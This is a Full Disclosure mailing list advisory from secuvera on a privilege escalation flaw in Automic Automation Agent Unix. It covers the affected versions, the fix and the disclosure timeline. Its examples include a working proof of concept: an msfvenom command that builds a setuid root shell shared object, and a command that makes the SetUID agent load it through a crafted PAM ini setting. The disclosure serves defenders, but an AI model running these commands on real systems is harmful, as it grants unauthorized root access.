| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <af1747d9092049d3a910d9d78c7f47cb@secuvera.de>
Date: Mon, 12 May 2025 11:44:37 +0000
From: Flo Schäfer via Fulldisclosure
<fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] secuvera-SA-2025-01: Privilege Escalation in Automic
Automation Agent Unix
secuvera-SA-2025-01: Privilege Escalation
Affected Products
Automic Automation Agent Unix <24.3.0 HF4, <21.0.13 HF1
References
secuvera-SA-2025-01
CVE not assigned yet
CWE-426: Untrusted Search Path
CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L
Summary:
An agent configured to run in privileged mode using the SetUID-Bit can be used to escalate privileges, by supplying an ini file with the "authentication" option set to "PAM" and the "libName" option set to a shared object file controlled by the attacker.
The shared object will be loaded in an elevated context and can be used to execute arbitrary code as root.
Effect:
The vulnerability results in privilege escalation, caused by arbitrary code execution in the context of the vulnerable application.
Examples:
1. Generate shared object file using msfvenom
$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so
2. Run the ucxjlx6 executable as follows
$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")
Solution:
Update to version 24.3.0 HF4, 21.0.13 HF1 or higher
Disclosure Timeline:
2025/01/20 vulnerability discovered
2025/01/21 vendor contacted
2025/01/21 vendor acknowledged receipt
2025/02/04 requested status update
2025/02/04 provided clarification about the issue
2025/02/11 requested status update
2025/02/26 vendor confirmed vulnerability
2025/03/06 requested status update
2025/03/17 vendor provided fix and requested review
2025/04/03 vendor retracted request for review
2025/04/10 proposed date for public disclosure, vendor requested delay
2025/04/16 coordinated on cvss score and recommended fix
2025/04/28 requested status update
2025/05/02 vendor supplied tentative date for public disclosure
2025/05/08 requested status update
2025/05/12 public disclosure
Credits:
Flora Schaefer
fschaefer@...uvera.de
secuvera GmbH
https://www.secuvera.de
Disclaimer:
All information is provided without warranty. The intent is to
provide information to secure infrastructure and/or systems, not
to be able to attack or damage. Therefore secuvera shall
not be liable for any direct or indirect damages that might be
caused by using this information.
Mit freundlichen Grüßen
Flo Schäfer
Meine Pronomen sind sie*er/ihr*ihm. Ich freue mich über eine genderneutrale Anrede.
+49 7032/9758-29
--
#Neues von secuvera.de
- Vortrag auf der CSK-Summit 2025: https://www.secuvera.de/aktuelles/vortrag-auf-der-csk-summit-2025/
- 1.Platz bei GPTW: Bester Arbeitgeber in BW 2025: https://www.secuvera.de/aktuelles/1-platz-bei-gptw-bester-arbeitgeber-in-bw-2025/
- Jahresmeeting 2025 #insideVera: https://www.secuvera.de/aktuelles/jahresmeeting-2025-insidevera/
#Bleiben Sie informiert auf LinkedIn
https://www.linkedin.com/company/secuvera-gmbh
#Rechtliche Informationen
secuvera GmbH
Siedlerstraße 22-24
71126 Gäufelden/Stuttgart
www.secuvera.de
Registergericht: Amtsgericht Stuttgart HRB 241704
Geschäftsführer: Tobias Glemser, Reto Lorenz
Download attachment "smime.p7s" of type "application/x-pkcs7-signature" (5996 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists